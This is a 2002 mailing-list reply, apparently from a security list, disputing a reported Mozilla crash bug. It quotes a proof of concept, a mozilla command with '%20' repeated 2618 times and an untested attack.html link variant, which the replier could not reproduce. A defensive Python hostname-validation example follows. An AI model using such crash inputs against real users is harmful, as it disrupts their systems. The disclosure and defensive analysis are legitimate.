From: NyQuist (NyQuist@ntlworld.com)
Date: Sun Feb 17 2002 - 11:48:17 CST


    On Sun, 2002-02-17 at 16:24, Replugge [Rod] wrote:
    > NOTE TO THE MODERATOR: This was sent yesterday but I guess didn't
    > make it since this doesn't seem to affect Red Hat itself, it affects
    > the mozilla packages distributed by Ximian:
    >
    > The test system looks like:
    >
    > bash#~ rpm -qa | grep mozilla
    > mozilla-0.9.8-1.ximian.2
    > mozilla-mail-0.9.8-1.ximian.2
    > mozilla-xmlterm-0.9.8-1.ximian.2
    > mozilla-devel-0.9.8-1.ximian.2
    > nautilus-mozilla-1.0.6-ximian.4
    > mozilla-psm-0.9.8-1.ximian.2
    > kdebindings-kmozilla-2.1.1-1
    >
    > This was tested in both RH7.1 and 7.2 with Ximian Gnome (with all
    > the updates).
    >
    >
    > There is a bug in mozilla 0.9.8-1 which allows you
    > to crash the X server.
    >
    > I won't go into details I'll just show the proof
    > of concept.
    >
    >
    > exploit:
    >
    > Local:
    > bash#~ mozilla `perl -e "print '%20' x 2618"`
    >
    >
    > Remote:
    > I haven't tested this but I guess:
    >
    > echo "<a href=http://`perl -e "print '%20' x 2618"`>attack_me</a>" >>
    > ./attack.html
    >
    > perhaps using "img src" or java script...
    >
    >
    > Best Regards
    >
    > --
    > /*
    > Rodrigo Gutierrez <rodrigo@trustix.com>
    > Trustix AS http://www.trustix.com
    > */
    >
    On one box: rpm -qa | grep mozilla
    mozilla-chat-0.9.7-1
    mozilla-mail-0.9.7-1
    nautilus-mozilla-1.0.6-ximian.6
    mozilla-0.9.7-1
    mozilla-devel-0.9.7-1
    mozilla-js-debugger-0.9.7-1
    mozilla-psm-0.9.7-1
    mozilla-dom-inspector-0.9.7-1

    Results in "www.perl -e "print %20 x 2618".com could not be found" (lol).
    perl -e "print '%20' x 2618" prints %20 (2618 times) and doesn't
    overflow perl.

    On the other box: rpm -qa | grep mozilla
    nautilus-mozilla-1.0.6-ximian.6
    mozilla-psm-0.9.8-2
    mozilla-0.9.8-2
    mozilla-devel-0.9.8-2

    Results in same 'not found' error.

    The attack.html (as per your script) results in "www.'perl not found".
    So if it does crash your X, it wasn't present in 0.9.7-1 and is fixed
    in 0.9.8-2.

    -- 
    NyQuist | Matthew Hall -- NyQuist at ntlworld dot com 
    Sig: Microsoft sells you Windows. Linux gives you the whole house.
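Both posters hand a URL whose "host" is 2618 copies of %20 to the browser; the client in NyQuist's test prepends www and appends .com and then fails to resolve it, because the string is not a DNS hostname at all. The following is an added example, not code from the thread or from Mozilla, showing the checks a client or proxy can run on a URL's host part before it reaches a resolver or a rendering path: the RFC 1035 length limits (63 octets per label, 253 octets total) and the letters-digits-hyphen character rule. The test URL is constructed inline from the same %20 x 2618 pattern quoted above; the function and constant names are this example's own.

```python
"""Hostname sanity checks for URLs, added example (not from the original thread).

Checks the host part of a URL against the DNS limits of RFC 1035 and the
letters/digits/hyphen (LDH) rule, and reports every reason a well-behaved
client should reject it before handing it to a resolver or a renderer.
"""
import re
from urllib.parse import urlsplit, unquote

MAX_LABEL_LEN = 63      # RFC 1035 section 2.3.4: one label is at most 63 octets
MAX_HOSTNAME_LEN = 253  # 255 octets of wire format minus root label and length bytes
LDH_CHARS = re.compile(r"^[A-Za-z0-9-]+$")  # characters allowed in a hostname label


def inspect_host(url):
    """Return measurements of the host part of `url` (no network access)."""
    parts = urlsplit(url)
    raw = parts.netloc.rsplit("@", 1)[-1]          # drop any userinfo
    # Strip a single trailing ":port"; bracketed IPv6 literals are not handled here.
    host = raw.rsplit(":", 1)[0] if raw.count(":") == 1 else raw
    labels = host.split(".") if host else []
    return {
        "raw_len": len(host),                      # octets as typed (escapes count 3 each)
        "decoded_len": len(unquote(host)),         # octets after %xx decoding
        "percent_escapes": host.count("%"),        # DNS names never contain '%'
        "longest_label": max((len(label) for label in labels), default=0),
        "ldh_ok": bool(labels) and all(LDH_CHARS.match(label) for label in labels),
    }


def host_problems(url):
    """List the reasons to reject the host of `url`; an empty list means it looks sane."""
    info = inspect_host(url)
    problems = []
    if info["raw_len"] == 0:
        problems.append("empty hostname")
    if info["raw_len"] > MAX_HOSTNAME_LEN:
        problems.append(f"hostname is {info['raw_len']} octets, limit is {MAX_HOSTNAME_LEN}")
    if info["longest_label"] > MAX_LABEL_LEN:
        problems.append(f"label of {info['longest_label']} octets, limit is {MAX_LABEL_LEN}")
    if info["percent_escapes"]:
        problems.append(f"{info['percent_escapes']} percent-escapes in hostname")
    if info["raw_len"] and not info["ldh_ok"]:
        problems.append("hostname contains characters outside letters/digits/hyphen")
    return problems


if __name__ == "__main__":
    # Constructed inputs: the %20 x 2618 string from the thread, and a normal host.
    poc_url = "http://" + "%20" * 2618
    for candidate in (poc_url, "http://www.neohapsis.com/"):
        label = candidate if len(candidate) < 40 else candidate[:37] + "..."
        print(label, inspect_host(candidate))
        for reason in host_problems(candidate) or ["no problems"]:
            print("   ", reason)
```

Run as-is it prints the measurements for both URLs: the %20 host is 7854 octets as typed (2618 after decoding), forms a single 7854-octet label, and fails the LDH rule, so it is rejected on four separate grounds, while the ordinary hostname passes every check. A client that applies these checks never builds the oversized string NyQuist's browser tried to look up.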